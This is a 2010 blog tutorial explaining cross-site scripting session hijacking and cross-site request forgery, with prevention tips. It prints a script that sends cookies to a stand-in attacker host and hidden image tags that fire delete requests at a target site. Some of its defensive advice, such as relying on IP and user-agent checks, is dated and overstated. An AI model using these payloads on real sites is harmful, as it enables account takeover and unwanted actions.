Basics of Cross Site Scripting AKA XSS and XSFR

August 2010

Cross site scripts lead to a number of security issues. The most important to remember are:

  • Session Hijacking - hacker steals user's session by getting his cookies and gets access to user's account
  • Cross Site Forgery Request - hacker uses users account to perform operation that was not intended at all

XSS session hijacking by stealing cookies

If hacker can execute JavaScript in your domain (for example formu.example.com) then hacker can inject something like this into your page:

<script>
document.write('<img src=\'http://hackers.host.fake.com/grab.php?s='+escape(document.cookie)+'\' />');
</script>

If you have a form or a page that takes a parameter from GET or POST and displays it in response without escaping you have a XSS hole.

Code like above executed in user's browser it will send current user cookies to hacker's server. Hacker can collect these cookies. Then set the session id in his browser and pretend to be the victim. Web server would not know the difference as long as cookie has correct session id user would be authenticated and could act with victims permissions.

Most frequently attacker would encode the request somehow and lure victim to click on his link. Then victom goes to the target website, XSS executes in the browser sends cookies and job done. The only assumption is that victim has to be logged in for this to work as attacker wants a session of logged in user.

A trickier and more stealth version of the attack is to place a invisible iframe. Then user wont even have to click anything to open target website. User comes to your site and everything seems ok. There is some funny photo of some sort or whatever. On the same page there is a iframe that leads to target website with XSS request. User's browser loads iframe, requests the target page with cookies for the target domain. Then executes XSS and sends cookies to hacker's server. This way user never has to even see that his account on target website was compromised.

How to prevent XSS Session Hijacking attacks

To prevent this attack you should make sure it is not possible to inject any JavaScript into your site. You should also add server side checks to make sure user agent is checked and preferably IP address as well. That should make your site pretty much immune to session hijacking via XSS attacks

Good thing about this attack is that you can prevent it quite successfully by checking IP and user agent. If hacker got the cookies somehow you wont let him do anything as the IP in session wont match IP of request sender.

Cross Site Request Forgery - user's browser performs action that was not intended

This attack is extremely dangerous and its just last years that it became well known so there are still millions of websites that are exposed to XSRF attacks.

Idea of XSRF attack lies in the incorrect web applications design. GET requests should never modify data but web developers found it easier to place action links like delete or activate then creating forms for them. If you see something like

<a href="/delete_order.php?id=3">delete</a>

Then application is probably exposed to XSRF attacks. The point is that delete URL is now a regular URL and it can be loaded as image, iframe or any other source. Then hacker places something like this on his website (any web page):

<img src="http://target.site.com/delete_order.php?id=1" style="display: none;"/> 
<img src="http://target.site.com/delete_order.php?id=2" style="display: none;"/> 
<img src="http://target.site.com/delete_order.php?id=3" style="display: none;"/> 
<img src="http://target.site.com/delete_order.php?id=4" style="display: none;"/> 
...

Victim browser sees bunch of images so it just starts loading them. It does not know that each of the image calls will try to delete your order on target.site.com. Worst part is that it's victims browser that sends requests so IP check wont help you here at all.

Got it?

Once you realize how horrible it is you will never let your app do such thing ever again : -)

How to prevent XSRF attacks

XSRF attacks are based on the fact that hacker can force victims browser to send requests with his cookies etc.

There are 3 main methods of preventing the attack:

  • Use POST only – still not safe enough
  • Use single use tokens in forms
  • Use request headers check for AJAX calls

Best way is to use one time tokens. Then every form you show has a token which is valid only for certain user and only for limited time. It also can not be reused as its regenerated every time you load the form.

Then hacker would need to force the browser to load the form, extract the token and submit it but he would not be able to do it without XSS flaw in your site and even then it would be much more difficult.

More reading on XSS

Awesome website showing most XSS encoding attacks – how to encode your JS to get it executed in the browser.

XSRF on wikipedia

Comments

Post new comment

Image CAPTCHA

Main Blog Categories